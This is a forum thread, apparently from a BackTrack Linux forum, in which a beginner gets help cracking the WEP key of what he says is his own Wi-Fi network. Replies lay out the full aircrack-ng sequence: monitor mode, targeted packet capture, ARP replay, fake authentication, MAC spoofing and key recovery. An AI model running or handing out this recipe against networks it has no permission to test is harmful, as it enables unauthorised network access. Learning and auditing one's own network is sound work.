Page 1 of 2 12 LastLast
Results 1 to 10 of 11

Thread: I've tried everything...Help please

  1. #1
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    4

    Unhappy I've tried everything...Help please

    I am a noob when it comes to Linux and command line. (I am trying my best to learn with no success)

    Now that's said, I have read a hundred tutorials trying to crack WEP. With every attempt I crack and burn. I first started with Ubuntu using aircrack-ng and kismet (which I came to the channel hoping problem). Then after days of trying several different tutorials I gave up declaring my iwl3945 chipset was the problem and I ordered a rosewill usb adapter with a r8187 chipset. From there I still couldn't figure out the channel hoping issue and decided Back Track might be easier. Well I was wrong again. For starters I cant get kismet to work (its probably not configured and i don't know how). I have two wireless adapters and don't know which to use. I have no idea about how to do this being that I never progressed much past monitor mode and failed miserably at that too. I have been trying this for two weeks without success.

    If I could get one of you geniuses to walk me through all of this it would be greatly appreciated.

  2. #2
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    Go back to your ubuntu, use a dumping program which is part of the aircrack suite rather than kismet, specifically the -c switch for it, and then go follow one of the hundreds of video's on google.

    Removal of the channel hopping should solve most of your issues. Don't forget monitor mode.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  3. #3
    Junior Member
    Join Date
    Feb 2007
    Posts
    74

    Default

    Start with airmon-ng. This will display both wireless adapters and their subsequent chipsets, from here you should be able to see which one is the rosewill. Set that one to monitor:
    Code:
    airmon-ng start [device]
    This will start the device in monitor mode.

    From here you can run airodump-ng:

    Code:
    airodump-ng [device]
    Once you've found the BSSID you're trying to crack ctrl+c to return to the prompt so you can narrow down to just that BSSID and the channel it resides on (shows in the airodump headers), to do this do something like:

    Code:
    airodump-ng [device] --bssid [router mac address] -w [filename] -c [channel]
    This will lock the bssid and the channel it's on which will help your hoping problems. It will also write all the IVs you receive to [filename]-01.cap in the current directory you ran airodump-ng from. From here you can begin to run your aireplay attacks, I suggest looking in the how-to and tutorial sections of the forum here, there are numerous examples of how to go from here.

  4. #4
    Dooms_day
    Guest

    Default

    i used aireplay-ng to ping a router for unique IVs then used airodump-ng at the same time on the one channel and one ssid (by defualt it hops over many channels). i ran them both all night on a laptop and by the time i got 500k IVs i cracked it with aircrack-ng in two seconds,

    and that was my first wep crack

  5. #5
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    4

    Default

    Ok, I finally did it, I'm not sure what I did right, but I did it. But I only used the r8187 chipset.

    Btw, thanks Aspekt9

    So what I did was:

    To enter monitor mode
    1. airmon-ng start (device)

    To find the networt name and mac
    2. airodump-ng (device)

    To find my mac
    3.ifconfig

    ?
    4. airodump-ng (device) –bssid (router mac) -w (filename) -c (channel)

    ?
    5.xterm -hold -e "aireplay-ng -3 -b (router mac) -h (my mac) (device)" &

    ?
    6.xterm -hold -e "aireplay-ng -1 6000 -o 1 -q 10 -e "(network name)" -a (router mac) -h (my mac) (device)" &


    To crack the code (i guess)???
    7.xterm -hold -e "aircrack-ng -z (filename)*cap" &


    And there was the key to my network

    Could y'all do me a big favor and help clean this up, and explain what I did?

    I greatly appreciate everyones help so far and would greatly appreciate any further help.....

  6. #6
    Junior Member
    Join Date
    Feb 2007
    Posts
    74

    Default

    So to summarize using your steps:

    This command puts the device in monitor mode so we can monitor incoming IVs:

    Code:
    airmon-ng start [device]
    To find the networt name and BSSID (router mac address):

    Code:
    airodump-ng [device]
    To find source (our) mac address

    Code:
    ifconfig or macchanger --show [device]
    note: to cut down on time having to memorize or copy and paste the mac address all the time we can change our mac before entering monitor mode by using

    Code:
    macchanger --mac 00:11:22:33:44:55 [device]
    To lock onto our BSSID and the channel our BSSID is on, as well as write all the incoming IVs to a file, we use the following command:

    Code:
    airodump-ng [device] –bssid [router mac] -w [filename] -c [channel]
    Replay packets from a wireless client which is currently associated with the AP (which is us since this is a clientless attack) and attempt to generate new IVs.

    Code:
    aireplay-ng -3 -b [router mac] -h [my mac] [device]
    Since this is a clientless attack, we need to be sure we're associated to the AP that we're trying to generate IVs from, to do this we use Fake Authentication to authenticate us to the AP:

    Code:
    aireplay-ng -1 6000 -o 1 -q 10 -e [network name] -a [router mac] -h [my mac] [device]

    To crack the key we use:

    Code:
    aircrack-ng -z (filename)*cap
    note: you can also specify -n 64,128 depending on the key length. (128 is default)

  7. #7
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    4

    Default

    Thanks agian.

    Now I have another question. In lots of tutorials I have read there isn't much explanation of how long you run?
    Code:
    airodump-ng [device] –bssid [router mac] -w [filename] -c [channel]
    And do you close it with ctrl+c or just let it run till you've cracked the code?

    I'm wondering the same about this?
    Code:
    aireplay-ng -3 -b [router mac] -h [my mac] [device]
    And on this one you only have to run it till you get successful authentication right?
    Code:
    aireplay-ng -1 6000 -o 1 -q 10 -e [network name] -a [router mac] -h [my mac] [device]

  8. #8
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    4

    Default

    Ok, so I think I figured it out after playing with is a little bit. So you run the airodump, and both the aireplay commands at the same time to capture the IV's? Without the fake authentication it will capture the IV's, but it does so real slow.

  9. #9
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by kraziejason View Post
    Ok, so I think I figured it out after playing with is a little bit. So you run the airodump, and both the aireplay commands at the same time to capture the IV's? Without the fake authentication it will capture the IV's, but it does so real slow.
    Everyone is telling you to start with this or start with that, but not one has bothered to mention that you should start with the manual pages.
    The actual instructions from the APP dev's. It will really make a huge difference if you take 20-30 minutes to read and understand what is going on.
    tutorial [Aircrack-ng]
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  10. #10
    Just burned his ISO
    Join Date
    Aug 2009
    Posts
    1

    Default

    Linux is really confusing for me too.

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •